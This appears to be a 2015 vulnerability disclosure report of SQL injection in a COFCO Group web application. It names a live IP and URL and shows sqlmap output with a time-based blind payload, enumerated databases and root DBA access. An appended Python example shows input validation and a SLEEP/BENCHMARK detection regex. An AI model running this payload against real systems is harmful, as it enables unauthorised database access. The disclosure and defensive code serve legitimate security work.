2015-08-12: Details sent to the vendor, awaiting vendor handling
2015-08-12: Vendor confirmed; details disclosed to the vendor only
2015-08-22: Details disclosed to core white hats and relevant domain experts
2015-09-01: Details disclosed to ordinary white hats
2015-09-11: Details disclosed to intern white hats
2015-09-26: Details disclosed to the public
SQL injection on a COFCO Group (中粮集团) site
Injection point: http://219.143.252.220/yyoa/checkWaitdo.jsp?userID=1
Run it through sqlmap:
---
Parameter: userID (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: userID=1' AND (SELECT * FROM (SELECT(SLEEP(5)))PlDJ) AND 'mYTy'='mYTy
---
[19:15:25] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12
[19:15:25] [INFO] fetching database names
[19:15:25] [INFO] fetching number of databases
[19:15:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[19:15:37] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
5
[19:15:43] [INFO] retrieved:
[19:15:48] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[19:17:13] [INFO] retrieved: mysql
[19:17:38] [INFO] retrieved: mysql3235
[19:18:18] [INFO] retrieved: temp
[19:18:40] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] mysql
[*] mysql3235
[*] temp
[*] test
[19:19:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/219.143.252.220'
is-dba: the current user is root@localhost!
[19:47:28] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12
[19:47:28] [INFO] testing if current user is DBA
[19:47:28] [INFO] fetching current user
[19:47:28] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[19:47:38] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[19:47:48] [INFO] adjusting time delay to 1 second due to good response times
root@localhost
current user is DBA: True
[19:49:02] [INFO] fetched data logged to text files under '/root/.sqlmap/output/219.143.252.220'
Fix: filter and escape the input.
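What that fix looks like for this parameter, as an added example that is not part of the original report or the affected application: userID is treated as a numeric key (assumption), so it is whitelisted as a bare integer and bound as a query parameter rather than concatenated, and a log-side check flags the delay functions that time-based blind probes like the one above rely on. The in-memory SQLite table is constructed for the demo.

```python
import re
import sqlite3

# Payload exactly as it appears in the sqlmap output above.
SQLMAP_PAYLOAD = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))PlDJ) AND 'mYTy'='mYTy"

# Assumption: userID is a positive integer surrogate key, so that is the whole whitelist.
USER_ID_RE = re.compile(r"[1-9][0-9]{0,9}")
# Time-based blind probes against MySQL depend on a delay function in the query.
TIME_PROBE_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)


def make_db():
    """Constructed in-memory stand-in for the OA system's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userID INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def build_vulnerable_sql(user_id):
    """The injectable pattern: the raw request parameter is spliced into the statement."""
    return "SELECT name FROM users WHERE userID='" + user_id + "'"


def lookup_hardened(conn, user_id):
    """Reject anything that is not a bare integer, then bind the value instead of interpolating it."""
    if not USER_ID_RE.fullmatch(user_id):
        raise ValueError("invalid userID")
    rows = conn.execute("SELECT name FROM users WHERE userID=?", (int(user_id),))
    return [r[0] for r in rows]


def is_time_based_probe(user_id):
    """Access-log / WAF check: does the parameter value carry a delay-function call?"""
    return TIME_PROBE_RE.search(user_id) is not None
```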
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-08-12 15:38
Thank you very much!
None